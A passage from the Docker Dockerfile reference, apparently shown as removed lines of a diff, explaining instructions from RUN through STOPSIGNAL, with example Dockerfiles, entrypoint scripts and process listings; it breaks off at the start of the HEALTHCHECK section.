of the -current image and commit the results. The resulting committed image will be -used for the next step in the `Dockerfile`. - -Layering `RUN` instructions and generating commits conforms to the core -concepts of Docker where commits are cheap and containers can be created from -any point in an image's history, much like source control. - -The *exec* form makes it possible to avoid shell string munging, and to `RUN` -commands using a base image that does not contain the specified shell executable. - -The default shell for the *shell* form can be changed using the `SHELL` -command. - -In the *shell* form you can use a `\` (backslash) to continue a single -RUN instruction onto the next line. For example, consider these two lines: - -``` -RUN /bin/bash -c 'source $HOME/.bashrc; \ -echo $HOME' -``` -Together they are equivalent to this single line: - -``` -RUN /bin/bash -c 'source $HOME/.bashrc; echo $HOME' -``` - -> **Note**: -> To use a different shell, other than '/bin/sh', use the *exec* form -> passing in the desired shell. For example, -> `RUN ["/bin/bash", "-c", "echo hello"]` - -> **Note**: -> The *exec* form is parsed as a JSON array, which means that -> you must use double-quotes (") around words not single-quotes ('). - -> **Note**: -> Unlike the *shell* form, the *exec* form does not invoke a command shell. -> This means that normal shell processing does not happen. For example, -> `RUN [ "echo", "$HOME" ]` will not do variable substitution on `$HOME`. -> If you want shell processing then either use the *shell* form or execute -> a shell directly, for example: `RUN [ "sh", "-c", "echo $HOME" ]`. -> When using the exec form and executing a shell directly, as in the case for -> the shell form, it is the shell that is doing the environment variable -> expansion, not docker. -> -> **Note**: -> In the *JSON* form, it is necessary to escape backslashes. This is -> particularly relevant on Windows where the backslash is the path separator. -> The following line would otherwise be treated as *shell* form due to not -> being valid JSON, and fail in an unexpected way: -> `RUN ["c:\windows\system32\tasklist.exe"]` -> The correct syntax for this example is: -> `RUN ["c:\\windows\\system32\\tasklist.exe"]` - -The cache for `RUN` instructions isn't invalidated automatically during -the next build. The cache for an instruction like -`RUN apt-get dist-upgrade -y` will be reused during the next build. The -cache for `RUN` instructions can be invalidated by using the `--no-cache` -flag, for example `docker build --no-cache`. - -See the [`Dockerfile` Best Practices -guide](https://docs.docker.com/engine/userguide/eng-image/dockerfile_best-practices/#/build-cache) for more information. - -The cache for `RUN` instructions can be invalidated by `ADD` instructions. See -[below](#add) for details. - -### Known issues (RUN) - -- [Issue 783](https://github.com/docker/docker/issues/783) is about file - permissions problems that can occur when using the AUFS file system. You - might notice it during an attempt to `rm` a file, for example. - - For systems that have recent aufs version (i.e., `dirperm1` mount option can - be set), docker will attempt to fix the issue automatically by mounting - the layers with `dirperm1` option. More details on `dirperm1` option can be - found at [`aufs` man page](https://github.com/sfjro/aufs3-linux/tree/aufs3.18/Documentation/filesystems/aufs) - - If your system doesn't have support for `dirperm1`, the issue describes a workaround. - -## CMD - -The `CMD` instruction has three forms: - -- `CMD ["executable","param1","param2"]` (*exec* form, this is the preferred form) -- `CMD ["param1","param2"]` (as *default parameters to ENTRYPOINT*) -- `CMD command param1 param2` (*shell* form) - -There can only be one `CMD` instruction in a `Dockerfile`. If you list more than one `CMD` -then only the last `CMD` will take effect. - -**The main purpose of a `CMD` is to provide defaults for an executing -container.** These defaults can include an executable, or they can omit -the executable, in which case you must specify an `ENTRYPOINT` -instruction as well. - -> **Note**: -> If `CMD` is used to provide default arguments for the `ENTRYPOINT` -> instruction, both the `CMD` and `ENTRYPOINT` instructions should be specified -> with the JSON array format. - -> **Note**: -> The *exec* form is parsed as a JSON array, which means that -> you must use double-quotes (") around words not single-quotes ('). - -> **Note**: -> Unlike the *shell* form, the *exec* form does not invoke a command shell. -> This means that normal shell processing does not happen. For example, -> `CMD [ "echo", "$HOME" ]` will not do variable substitution on `$HOME`. -> If you want shell processing then either use the *shell* form or execute -> a shell directly, for example: `CMD [ "sh", "-c", "echo $HOME" ]`. -> When using the exec form and executing a shell directly, as in the case for -> the shell form, it is the shell that is doing the environment variable -> expansion, not docker. - -When used in the shell or exec formats, the `CMD` instruction sets the command -to be executed when running the image. - -If you use the *shell* form of the `CMD`, then the `` will execute in -`/bin/sh -c`: - - FROM ubuntu - CMD echo "This is a test." | wc - - -If you want to **run your** `` **without a shell** then you must -express the command as a JSON array and give the full path to the executable. -**This array form is the preferred format of `CMD`.** Any additional parameters -must be individually expressed as strings in the array: - - FROM ubuntu - CMD ["/usr/bin/wc","--help"] - -If you would like your container to run the same executable every time, then -you should consider using `ENTRYPOINT` in combination with `CMD`. See -[*ENTRYPOINT*](#entrypoint). - -If the user specifies arguments to `docker run` then they will override the -default specified in `CMD`. - -> **Note**: -> Don't confuse `RUN` with `CMD`. `RUN` actually runs a command and commits -> the result; `CMD` does not execute anything at build time, but specifies -> the intended command for the image. - -## LABEL - - LABEL = = = ... - -The `LABEL` instruction adds metadata to an image. A `LABEL` is a -key-value pair. To include spaces within a `LABEL` value, use quotes and -backslashes as you would in command-line parsing. A few usage examples: - - LABEL "com.example.vendor"="ACME Incorporated" - LABEL com.example.label-with-value="foo" - LABEL version="1.0" - LABEL description="This text illustrates \ - that label-values can span multiple lines." - -An image can have more than one label. To specify multiple labels, -Docker recommends combining labels into a single `LABEL` instruction where -possible. Each `LABEL` instruction produces a new layer which can result in an -inefficient image if you use many labels. This example results in a single image -layer. - - LABEL multi.label1="value1" multi.label2="value2" other="value3" - -The above can also be written as: - - LABEL multi.label1="value1" \ - multi.label2="value2" \ - other="value3" - -Labels are additive including `LABEL`s in `FROM` images. If Docker -encounters a label/key that already exists, the new value overrides any previous -labels with identical keys. - -To view an image's labels, use the `docker inspect` command. - - "Labels": { - "com.example.vendor": "ACME Incorporated" - "com.example.label-with-value": "foo", - "version": "1.0", - "description": "This text illustrates that label-values can span multiple lines.", - "multi.label1": "value1", - "multi.label2": "value2", - "other": "value3" - }, - -## MAINTAINER (deprecated) - - MAINTAINER - -The `MAINTAINER` instruction sets the *Author* field of the generated images. -The `LABEL` instruction is a much more flexible version of this and you should use -it instead, as it enables setting any metadata you require, and can be viewed -easily, for example with `docker inspect`. To set a label corresponding to the -`MAINTAINER` field you could use: - - LABEL maintainer "SvenDowideit@home.org.au" - -This will then be visible from `docker inspect` with the other labels. - -## EXPOSE - - EXPOSE [...] - -The `EXPOSE` instruction informs Docker that the container listens on the -specified network ports at runtime. `EXPOSE` does not make the ports of the -container accessible to the host. To do that, you must use either the `-p` flag -to publish a range of ports or the `-P` flag to publish all of the exposed -ports. You can expose one port number and publish it externally under another -number. - -To set up port redirection on the host system, see [using the -P -flag](run.md#expose-incoming-ports). The Docker network feature supports -creating networks without the need to expose ports within the network, for -detailed information see the [overview of this -feature](https://docs.docker.com/engine/userguide/networking/)). - -## ENV - - ENV - ENV = ... - -The `ENV` instruction sets the environment variable `` to the value -``. This value will be in the environment of all "descendant" -`Dockerfile` commands and can be [replaced inline](#environment-replacement) in -many as well. - -The `ENV` instruction has two forms. The first form, `ENV `, -will set a single variable to a value. The entire string after the first -space will be treated as the `` - including characters such as -spaces and quotes. - -The second form, `ENV = ...`, allows for multiple variables to -be set at one time. Notice that the second form uses the equals sign (=) -in the syntax, while the first form does not. Like command line parsing, -quotes and backslashes can be used to include spaces within values. - -For example: - - ENV myName="John Doe" myDog=Rex\ The\ Dog \ - myCat=fluffy - -and - - ENV myName John Doe - ENV myDog Rex The Dog - ENV myCat fluffy - -will yield the same net results in the final image, but the first form -is preferred because it produces a single cache layer. - -The environment variables set using `ENV` will persist when a container is run -from the resulting image. You can view the values using `docker inspect`, and -change them using `docker run --env =`. - -> **Note**: -> Environment persistence can cause unexpected side effects. For example, -> setting `ENV DEBIAN_FRONTEND noninteractive` may confuse apt-get -> users on a Debian-based image. To set a value for a single command, use -> `RUN = `. - -## ADD - -ADD has two forms: - -- `ADD ... ` -- `ADD ["",... ""]` (this form is required for paths containing -whitespace) - -The `ADD` instruction copies new files, directories or remote file URLs from `` -and adds them to the filesystem of the image at the path ``. - -Multiple `` resource may be specified but if they are files or -directories then they must be relative to the source directory that is -being built (the context of the build). - -Each `` may contain wildcards and matching will be done using Go's -[filepath.Match](http://golang.org/pkg/path/filepath#Match) rules. For example: - - ADD hom* /mydir/ # adds all files starting with "hom" - ADD hom?.txt /mydir/ # ? is replaced with any single character, e.g., "home.txt" - -The `` is an absolute path, or a path relative to `WORKDIR`, into which -the source will be copied inside the destination container. - - ADD test relativeDir/ # adds "test" to `WORKDIR`/relativeDir/ - ADD test /absoluteDir/ # adds "test" to /absoluteDir/ - -All new files and directories are created with a UID and GID of 0. - -In the case where `` is a remote file URL, the destination will -have permissions of 600. If the remote file being retrieved has an HTTP -`Last-Modified` header, the timestamp from that header will be used -to set the `mtime` on the destination file. However, like any other file -processed during an `ADD`, `mtime` will not be included in the determination -of whether or not the file has changed and the cache should be updated. - -> **Note**: -> If you build by passing a `Dockerfile` through STDIN (`docker -> build - < somefile`), there is no build context, so the `Dockerfile` -> can only contain a URL based `ADD` instruction. You can also pass a -> compressed archive through STDIN: (`docker build - < archive.tar.gz`), -> the `Dockerfile` at the root of the archive and the rest of the -> archive will be used as the context of the build. - -> **Note**: -> If your URL files are protected using authentication, you -> will need to use `RUN wget`, `RUN curl` or use another tool from -> within the container as the `ADD` instruction does not support -> authentication. - -> **Note**: -> The first encountered `ADD` instruction will invalidate the cache for all -> following instructions from the Dockerfile if the contents of `` have -> changed. This includes invalidating the cache for `RUN` instructions. -> See the [`Dockerfile` Best Practices -guide](https://docs.docker.com/engine/userguide/eng-image/dockerfile_best-practices/#/build-cache) for more information. - - -`ADD` obeys the following rules: - -- The `` path must be inside the *context* of the build; - you cannot `ADD ../something /something`, because the first step of a - `docker build` is to send the context directory (and subdirectories) to the - docker daemon. - -- If `` is a URL and `` does not end with a trailing slash, then a - file is downloaded from the URL and copied to ``. - -- If `` is a URL and `` does end with a trailing slash, then the - filename is inferred from the URL and the file is downloaded to - `/`. For instance, `ADD http://example.com/foobar /` would - create the file `/foobar`. The URL must have a nontrivial path so that an - appropriate filename can be discovered in this case (`http://example.com` - will not work). - -- If `` is a directory, the entire contents of the directory are copied, - including filesystem metadata. - -> **Note**: -> The directory itself is not copied, just its contents. - -- If `` is a *local* tar archive in a recognized compression format - (identity, gzip, bzip2 or xz) then it is unpacked as a directory. Resources - from *remote* URLs are **not** decompressed. When a directory is copied or - unpacked, it has the same behavior as `tar -x`, the result is the union of: - - 1. Whatever existed at the destination path and - 2. The contents of the source tree, with conflicts resolved in favor - of "2." on a file-by-file basis. - - > **Note**: - > Whether a file is identified as a recognized compression format or not - > is done solely based on the contents of the file, not the name of the file. - > For example, if an empty file happens to end with `.tar.gz` this will not - > be recognized as a compressed file and **will not** generate any kind of - > decompression error message, rather the file will simply be copied to the - > destination. - -- If `` is any other kind of file, it is copied individually along with - its metadata. In this case, if `` ends with a trailing slash `/`, it - will be considered a directory and the contents of `` will be written - at `/base()`. - -- If multiple `` resources are specified, either directly or due to the - use of a wildcard, then `` must be a directory, and it must end with - a slash `/`. - -- If `` does not end with a trailing slash, it will be considered a - regular file and the contents of `` will be written at ``. - -- If `` doesn't exist, it is created along with all missing directories - in its path. - -## COPY - -COPY has two forms: - -- `COPY ... ` -- `COPY ["",... ""]` (this form is required for paths containing -whitespace) - -The `COPY` instruction copies new files or directories from `` -and adds them to the filesystem of the container at the path ``. - -Multiple `` resource may be specified but they must be relative -to the source directory that is being built (the context of the build). - -Each `` may contain wildcards and matching will be done using Go's -[filepath.Match](http://golang.org/pkg/path/filepath#Match) rules. For example: - - COPY hom* /mydir/ # adds all files starting with "hom" - COPY hom?.txt /mydir/ # ? is replaced with any single character, e.g., "home.txt" - -The `` is an absolute path, or a path relative to `WORKDIR`, into which -the source will be copied inside the destination container. - - COPY test relativeDir/ # adds "test" to `WORKDIR`/relativeDir/ - COPY test /absoluteDir/ # adds "test" to /absoluteDir/ - -All new files and directories are created with a UID and GID of 0. - -> **Note**: -> If you build using STDIN (`docker build - < somefile`), there is no -> build context, so `COPY` can't be used. - -`COPY` obeys the following rules: - -- The `` path must be inside the *context* of the build; - you cannot `COPY ../something /something`, because the first step of a - `docker build` is to send the context directory (and subdirectories) to the - docker daemon. - -- If `` is a directory, the entire contents of the directory are copied, - including filesystem metadata. - -> **Note**: -> The directory itself is not copied, just its contents. - -- If `` is any other kind of file, it is copied individually along with - its metadata. In this case, if `` ends with a trailing slash `/`, it - will be considered a directory and the contents of `` will be written - at `/base()`. - -- If multiple `` resources are specified, either directly or due to the - use of a wildcard, then `` must be a directory, and it must end with - a slash `/`. - -- If `` does not end with a trailing slash, it will be considered a - regular file and the contents of `` will be written at ``. - -- If `` doesn't exist, it is created along with all missing directories - in its path. - -## ENTRYPOINT - -ENTRYPOINT has two forms: - -- `ENTRYPOINT ["executable", "param1", "param2"]` - (*exec* form, preferred) -- `ENTRYPOINT command param1 param2` - (*shell* form) - -An `ENTRYPOINT` allows you to configure a container that will run as an executable. - -For example, the following will start nginx with its default content, listening -on port 80: - - docker run -i -t --rm -p 80:80 nginx - -Command line arguments to `docker run ` will be appended after all -elements in an *exec* form `ENTRYPOINT`, and will override all elements specified -using `CMD`. -This allows arguments to be passed to the entry point, i.e., `docker run -d` -will pass the `-d` argument to the entry point. -You can override the `ENTRYPOINT` instruction using the `docker run --entrypoint` -flag. - -The *shell* form prevents any `CMD` or `run` command line arguments from being -used, but has the disadvantage that your `ENTRYPOINT` will be started as a -subcommand of `/bin/sh -c`, which does not pass signals. -This means that the executable will not be the container's `PID 1` - and -will _not_ receive Unix signals - so your executable will not receive a -`SIGTERM` from `docker stop `. - -Only the last `ENTRYPOINT` instruction in the `Dockerfile` will have an effect. - -### Exec form ENTRYPOINT example - -You can use the *exec* form of `ENTRYPOINT` to set fairly stable default commands -and arguments and then use either form of `CMD` to set additional defaults that -are more likely to be changed. - - FROM ubuntu - ENTRYPOINT ["top", "-b"] - CMD ["-c"] - -When you run the container, you can see that `top` is the only process: - - $ docker run -it --rm --name test top -H - top - 08:25:00 up 7:27, 0 users, load average: 0.00, 0.01, 0.05 - Threads: 1 total, 1 running, 0 sleeping, 0 stopped, 0 zombie - %Cpu(s): 0.1 us, 0.1 sy, 0.0 ni, 99.7 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st - KiB Mem: 2056668 total, 1616832 used, 439836 free, 99352 buffers - KiB Swap: 1441840 total, 0 used, 1441840 free. 1324440 cached Mem - - PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND - 1 root 20 0 19744 2336 2080 R 0.0 0.1 0:00.04 top - -To examine the result further, you can use `docker exec`: - - $ docker exec -it test ps aux - USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND - root 1 2.6 0.1 19752 2352 ? Ss+ 08:24 0:00 top -b -H - root 7 0.0 0.1 15572 2164 ? R+ 08:25 0:00 ps aux - -And you can gracefully request `top` to shut down using `docker stop test`. - -The following `Dockerfile` shows using the `ENTRYPOINT` to run Apache in the -foreground (i.e., as `PID 1`): - -``` -FROM debian:stable -RUN apt-get update && apt-get install -y --force-yes apache2 -EXPOSE 80 443 -VOLUME ["/var/www", "/var/log/apache2", "/etc/apache2"] -ENTRYPOINT ["/usr/sbin/apache2ctl", "-D", "FOREGROUND"] -``` - -If you need to write a starter script for a single executable, you can ensure that -the final executable receives the Unix signals by using `exec` and `gosu` -commands: - -```bash -#!/bin/bash -set -e - -if [ "$1" = 'postgres' ]; then - chown -R postgres "$PGDATA" - - if [ -z "$(ls -A "$PGDATA")" ]; then - gosu postgres initdb - fi - - exec gosu postgres "$@" -fi - -exec "$@" -``` - -Lastly, if you need to do some extra cleanup (or communicate with other containers) -on shutdown, or are co-ordinating more than one executable, you may need to ensure -that the `ENTRYPOINT` script receives the Unix signals, passes them on, and then -does some more work: - -``` -#!/bin/sh -# Note: I've written this using sh so it works in the busybox container too - -# USE the trap if you need to also do manual cleanup after the service is stopped, -# or need to start multiple services in the one container -trap "echo TRAPed signal" HUP INT QUIT TERM - -# start service in background here -/usr/sbin/apachectl start - -echo "[hit enter key to exit] or run 'docker stop '" -read - -# stop service and clean up here -echo "stopping apache" -/usr/sbin/apachectl stop - -echo "exited $0" -``` - -If you run this image with `docker run -it --rm -p 80:80 --name test apache`, -you can then examine the container's processes with `docker exec`, or `docker top`, -and then ask the script to stop Apache: - -```bash -$ docker exec -it test ps aux -USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND -root 1 0.1 0.0 4448 692 ? Ss+ 00:42 0:00 /bin/sh /run.sh 123 cmd cmd2 -root 19 0.0 0.2 71304 4440 ? Ss 00:42 0:00 /usr/sbin/apache2 -k start -www-data 20 0.2 0.2 360468 6004 ? Sl 00:42 0:00 /usr/sbin/apache2 -k start -www-data 21 0.2 0.2 360468 6000 ? Sl 00:42 0:00 /usr/sbin/apache2 -k start -root 81 0.0 0.1 15572 2140 ? R+ 00:44 0:00 ps aux -$ docker top test -PID USER COMMAND -10035 root {run.sh} /bin/sh /run.sh 123 cmd cmd2 -10054 root /usr/sbin/apache2 -k start -10055 33 /usr/sbin/apache2 -k start -10056 33 /usr/sbin/apache2 -k start -$ /usr/bin/time docker stop test -test -real 0m 0.27s -user 0m 0.03s -sys 0m 0.03s -``` - -> **Note:** you can override the `ENTRYPOINT` setting using `--entrypoint`, -> but this can only set the binary to *exec* (no `sh -c` will be used). - -> **Note**: -> The *exec* form is parsed as a JSON array, which means that -> you must use double-quotes (") around words not single-quotes ('). - -> **Note**: -> Unlike the *shell* form, the *exec* form does not invoke a command shell. -> This means that normal shell processing does not happen. For example, -> `ENTRYPOINT [ "echo", "$HOME" ]` will not do variable substitution on `$HOME`. -> If you want shell processing then either use the *shell* form or execute -> a shell directly, for example: `ENTRYPOINT [ "sh", "-c", "echo $HOME" ]`. -> When using the exec form and executing a shell directly, as in the case for -> the shell form, it is the shell that is doing the environment variable -> expansion, not docker. - -### Shell form ENTRYPOINT example - -You can specify a plain string for the `ENTRYPOINT` and it will execute in `/bin/sh -c`. -This form will use shell processing to substitute shell environment variables, -and will ignore any `CMD` or `docker run` command line arguments. -To ensure that `docker stop` will signal any long running `ENTRYPOINT` executable -correctly, you need to remember to start it with `exec`: - - FROM ubuntu - ENTRYPOINT exec top -b - -When you run this image, you'll see the single `PID 1` process: - - $ docker run -it --rm --name test top - Mem: 1704520K used, 352148K free, 0K shrd, 0K buff, 140368121167873K cached - CPU: 5% usr 0% sys 0% nic 94% idle 0% io 0% irq 0% sirq - Load average: 0.08 0.03 0.05 2/98 6 - PID PPID USER STAT VSZ %VSZ %CPU COMMAND - 1 0 root R 3164 0% 0% top -b - -Which will exit cleanly on `docker stop`: - - $ /usr/bin/time docker stop test - test - real 0m 0.20s - user 0m 0.02s - sys 0m 0.04s - -If you forget to add `exec` to the beginning of your `ENTRYPOINT`: - - FROM ubuntu - ENTRYPOINT top -b - CMD --ignored-param1 - -You can then run it (giving it a name for the next step): - - $ docker run -it --name test top --ignored-param2 - Mem: 1704184K used, 352484K free, 0K shrd, 0K buff, 140621524238337K cached - CPU: 9% usr 2% sys 0% nic 88% idle 0% io 0% irq 0% sirq - Load average: 0.01 0.02 0.05 2/101 7 - PID PPID USER STAT VSZ %VSZ %CPU COMMAND - 1 0 root S 3168 0% 0% /bin/sh -c top -b cmd cmd2 - 7 1 root R 3164 0% 0% top -b - -You can see from the output of `top` that the specified `ENTRYPOINT` is not `PID 1`. - -If you then run `docker stop test`, the container will not exit cleanly - the -`stop` command will be forced to send a `SIGKILL` after the timeout: - - $ docker exec -it test ps aux - PID USER COMMAND - 1 root /bin/sh -c top -b cmd cmd2 - 7 root top -b - 8 root ps aux - $ /usr/bin/time docker stop test - test - real 0m 10.19s - user 0m 0.04s - sys 0m 0.03s - -### Understand how CMD and ENTRYPOINT interact - -Both `CMD` and `ENTRYPOINT` instructions define what command gets executed when running a container. -There are few rules that describe their co-operation. - -1. Dockerfile should specify at least one of `CMD` or `ENTRYPOINT` commands. - -2. `ENTRYPOINT` should be defined when using the container as an executable. - -3. `CMD` should be used as a way of defining default arguments for an `ENTRYPOINT` command -or for executing an ad-hoc command in a container. - -4. `CMD` will be overridden when running the container with alternative arguments. - -The table below shows what command is executed for different `ENTRYPOINT` / `CMD` combinations: - -| | No ENTRYPOINT | ENTRYPOINT exec_entry p1_entry | ENTRYPOINT ["exec_entry", "p1_entry"] | -|--------------------------------|----------------------------|--------------------------------|------------------------------------------------| -| **No CMD** | *error, not allowed* | /bin/sh -c exec_entry p1_entry | exec_entry p1_entry | -| **CMD ["exec_cmd", "p1_cmd"]** | exec_cmd p1_cmd | /bin/sh -c exec_entry p1_entry | exec_entry p1_entry exec_cmd p1_cmd | -| **CMD ["p1_cmd", "p2_cmd"]** | p1_cmd p2_cmd | /bin/sh -c exec_entry p1_entry | exec_entry p1_entry p1_cmd p2_cmd | -| **CMD exec_cmd p1_cmd** | /bin/sh -c exec_cmd p1_cmd | /bin/sh -c exec_entry p1_entry | exec_entry p1_entry /bin/sh -c exec_cmd p1_cmd | - -## VOLUME - - VOLUME ["/data"] - -The `VOLUME` instruction creates a mount point with the specified name -and marks it as holding externally mounted volumes from native host or other -containers. The value can be a JSON array, `VOLUME ["/var/log/"]`, or a plain -string with multiple arguments, such as `VOLUME /var/log` or `VOLUME /var/log -/var/db`. For more information/examples and mounting instructions via the -Docker client, refer to -[*Share Directories via Volumes*](https://docs.docker.com/engine/tutorials/dockervolumes/#/mount-a-host-directory-as-a-data-volume) -documentation. - -The `docker run` command initializes the newly created volume with any data -that exists at the specified location within the base image. For example, -consider the following Dockerfile snippet: - - FROM ubuntu - RUN mkdir /myvol - RUN echo "hello world" > /myvol/greeting - VOLUME /myvol - -This Dockerfile results in an image that causes `docker run`, to -create a new mount point at `/myvol` and copy the `greeting` file -into the newly created volume. - -> **Note**: -> If any build steps change the data within the volume after it has been -> declared, those changes will be discarded. - -> **Note**: -> The list is parsed as a JSON array, which means that -> you must use double-quotes (") around words not single-quotes ('). - -## USER - - USER daemon - -The `USER` instruction sets the user name or UID to use when running the image -and for any `RUN`, `CMD` and `ENTRYPOINT` instructions that follow it in the -`Dockerfile`. - -## WORKDIR - - WORKDIR /path/to/workdir - -The `WORKDIR` instruction sets the working directory for any `RUN`, `CMD`, -`ENTRYPOINT`, `COPY` and `ADD` instructions that follow it in the `Dockerfile`. -If the `WORKDIR` doesn't exist, it will be created even if it's not used in any -subsequent `Dockerfile` instruction. - -It can be used multiple times in the one `Dockerfile`. If a relative path -is provided, it will be relative to the path of the previous `WORKDIR` -instruction. For example: - - WORKDIR /a - WORKDIR b - WORKDIR c - RUN pwd - -The output of the final `pwd` command in this `Dockerfile` would be -`/a/b/c`. - -The `WORKDIR` instruction can resolve environment variables previously set using -`ENV`. You can only use environment variables explicitly set in the `Dockerfile`. -For example: - - ENV DIRPATH /path - WORKDIR $DIRPATH/$DIRNAME - RUN pwd - -The output of the final `pwd` command in this `Dockerfile` would be -`/path/$DIRNAME` - -## ARG - - ARG [=] - -The `ARG` instruction defines a variable that users can pass at build-time to -the builder with the `docker build` command using the `--build-arg =` -flag. If a user specifies a build argument that was not -defined in the Dockerfile, the build outputs a warning. - -``` -[Warning] One or more build-args [foo] were not consumed. -``` - -The Dockerfile author can define a single variable by specifying `ARG` once or many -variables by specifying `ARG` more than once. For example, a valid Dockerfile: - -``` -FROM busybox -ARG user1 -ARG buildno -... -``` - -A Dockerfile author may optionally specify a default value for an `ARG` instruction: - -``` -FROM busybox -ARG user1=someuser -ARG buildno=1 -... -``` - -If an `ARG` value has a default and if there is no value passed at build-time, the -builder uses the default. - -An `ARG` variable definition comes into effect from the line on which it is -defined in the `Dockerfile` not from the argument's use on the command-line or -elsewhere. For example, consider this Dockerfile: - -``` -1 FROM busybox -2 USER ${user:-some_user} -3 ARG user -4 USER $user -... -``` -A user builds this file by calling: - -``` -$ docker build --build-arg user=what_user Dockerfile -``` - -The `USER` at line 2 evaluates to `some_user` as the `user` variable is defined on the -subsequent line 3. The `USER` at line 4 evaluates to `what_user` as `user` is -defined and the `what_user` value was passed on the command line. Prior to its definition by an -`ARG` instruction, any use of a variable results in an empty string. - -> **Warning:** It is not recommended to use build-time variables for -> passing secrets like github keys, user credentials etc. Build-time variable -> values are visible to any user of the image with the `docker history` command. - -You can use an `ARG` or an `ENV` instruction to specify variables that are -available to the `RUN` instruction. Environment variables defined using the -`ENV` instruction always override an `ARG` instruction of the same name. Consider -this Dockerfile with an `ENV` and `ARG` instruction. - -``` -1 FROM ubuntu -2 ARG CONT_IMG_VER -3 ENV CONT_IMG_VER v1.0.0 -4 RUN echo $CONT_IMG_VER -``` -Then, assume this image is built with this command: - -``` -$ docker build --build-arg CONT_IMG_VER=v2.0.1 Dockerfile -``` - -In this case, the `RUN` instruction uses `v1.0.0` instead of the `ARG` setting -passed by the user:`v2.0.1` This behavior is similar to a shell -script where a locally scoped variable overrides the variables passed as -arguments or inherited from environment, from its point of definition. - -Using the example above but a different `ENV` specification you can create more -useful interactions between `ARG` and `ENV` instructions: - -``` -1 FROM ubuntu -2 ARG CONT_IMG_VER -3 ENV CONT_IMG_VER ${CONT_IMG_VER:-v1.0.0} -4 RUN echo $CONT_IMG_VER -``` - -Unlike an `ARG` instruction, `ENV` values are always persisted in the built -image. Consider a docker build without the `--build-arg` flag: - -``` -$ docker build Dockerfile -``` - -Using this Dockerfile example, `CONT_IMG_VER` is still persisted in the image but -its value would be `v1.0.0` as it is the default set in line 3 by the `ENV` instruction. - -The variable expansion technique in this example allows you to pass arguments -from the command line and persist them in the final image by leveraging the -`ENV` instruction. Variable expansion is only supported for [a limited set of -Dockerfile instructions.](#environment-replacement) - -Docker has a set of predefined `ARG` variables that you can use without a -corresponding `ARG` instruction in the Dockerfile. - -* `HTTP_PROXY` -* `http_proxy` -* `HTTPS_PROXY` -* `https_proxy` -* `FTP_PROXY` -* `ftp_proxy` -* `NO_PROXY` -* `no_proxy` - -To use these, simply pass them on the command line using the flag: - -``` ---build-arg = -``` - -### Impact on build caching - -`ARG` variables are not persisted into the built image as `ENV` variables are. -However, `ARG` variables do impact the build cache in similar ways. If a -Dockerfile defines an `ARG` variable whose value is different from a previous -build, then a "cache miss" occurs upon its first usage, not its definition. In -particular, all `RUN` instructions following an `ARG` instruction use the `ARG` -variable implicitly (as an environment variable), thus can cause a cache miss. - -For example, consider these two Dockerfile: - -``` -1 FROM ubuntu -2 ARG CONT_IMG_VER -3 RUN echo $CONT_IMG_VER -``` - -``` -1 FROM ubuntu -2 ARG CONT_IMG_VER -3 RUN echo hello -``` - -If you specify `--build-arg CONT_IMG_VER=` on the command line, in both -cases, the specification on line 2 does not cause a cache miss; line 3 does -cause a cache miss.`ARG CONT_IMG_VER` causes the RUN line to be identified -as the same as running `CONT_IMG_VER=` echo hello, so if the `` -changes, we get a cache miss. - -Consider another example under the same command line: - -``` -1 FROM ubuntu -2 ARG CONT_IMG_VER -3 ENV CONT_IMG_VER $CONT_IMG_VER -4 RUN echo $CONT_IMG_VER -``` -In this example, the cache miss occurs on line 3. The miss happens because -the variable's value in the `ENV` references the `ARG` variable and that -variable is changed through the command line. In this example, the `ENV` -command causes the image to include the value. - -If an `ENV` instruction overrides an `ARG` instruction of the same name, like -this Dockerfile: - -``` -1 FROM ubuntu -2 ARG CONT_IMG_VER -3 ENV CONT_IMG_VER hello -4 RUN echo $CONT_IMG_VER -``` - -Line 3 does not cause a cache miss because the value of `CONT_IMG_VER` is a -constant (`hello`). As a result, the environment variables and values used on -the `RUN` (line 4) doesn't change between builds. - -## ONBUILD - - ONBUILD [INSTRUCTION] - -The `ONBUILD` instruction adds to the image a *trigger* instruction to -be executed at a later time, when the image is used as the base for -another build. The trigger will be executed in the context of the -downstream build, as if it had been inserted immediately after the -`FROM` instruction in the downstream `Dockerfile`. - -Any build instruction can be registered as a trigger. - -This is useful if you are building an image which will be used as a base -to build other images, for example an application build environment or a -daemon which may be customized with user-specific configuration. - -For example, if your image is a reusable Python application builder, it -will require application source code to be added in a particular -directory, and it might require a build script to be called *after* -that. You can't just call `ADD` and `RUN` now, because you don't yet -have access to the application source code, and it will be different for -each application build. You could simply provide application developers -with a boilerplate `Dockerfile` to copy-paste into their application, but -that is inefficient, error-prone and difficult to update because it -mixes with application-specific code. - -The solution is to use `ONBUILD` to register advance instructions to -run later, during the next build stage. - -Here's how it works: - -1. When it encounters an `ONBUILD` instruction, the builder adds a - trigger to the metadata of the image being built. The instruction - does not otherwise affect the current build. -2. At the end of the build, a list of all triggers is stored in the - image manifest, under the key `OnBuild`. They can be inspected with - the `docker inspect` command. -3. Later the image may be used as a base for a new build, using the - `FROM` instruction. As part of processing the `FROM` instruction, - the downstream builder looks for `ONBUILD` triggers, and executes - them in the same order they were registered. If any of the triggers - fail, the `FROM` instruction is aborted which in turn causes the - build to fail. If all triggers succeed, the `FROM` instruction - completes and the build continues as usual. -4. Triggers are cleared from the final image after being executed. In - other words they are not inherited by "grand-children" builds. - -For example you might add something like this: - - [...] - ONBUILD ADD . /app/src - ONBUILD RUN /usr/local/bin/python-build --dir /app/src - [...] - -> **Warning**: Chaining `ONBUILD` instructions using `ONBUILD ONBUILD` isn't allowed. - -> **Warning**: The `ONBUILD` instruction may not trigger `FROM` or `MAINTAINER` instructions. - -## STOPSIGNAL - - STOPSIGNAL signal - -The `STOPSIGNAL` instruction sets the system call signal that will be sent to the container to exit. -This signal can be a valid unsigned number that matches a position in the kernel's syscall table, for instance 9, -or a signal name in the format SIGNAME, for instance SIGKILL. - -## HEALTHCHECK - -The `HEALTHCHECK` instruction has two forms: - -* `HEALTHCHECK [OPTIONS] CMD command` (check container health by running a command inside the container) -* `HEALTHCHECK NONE` (disable any healthcheck inherited from the base image) - -The `HEALTHCHECK` instruction tells Docker how to test a container to check that -it is still working. This can detect cases such as a web server that is stuck in -an infinite loop and unable to handle new connections, even though the server -process is still running. - -When a container has a healthcheck specified, it has a _health status_ in -addition to its normal status. This status is initially `starting`. Whenever a -health check passes, it becomes `healthy` (whatever state it was previously in). -After a certain number of 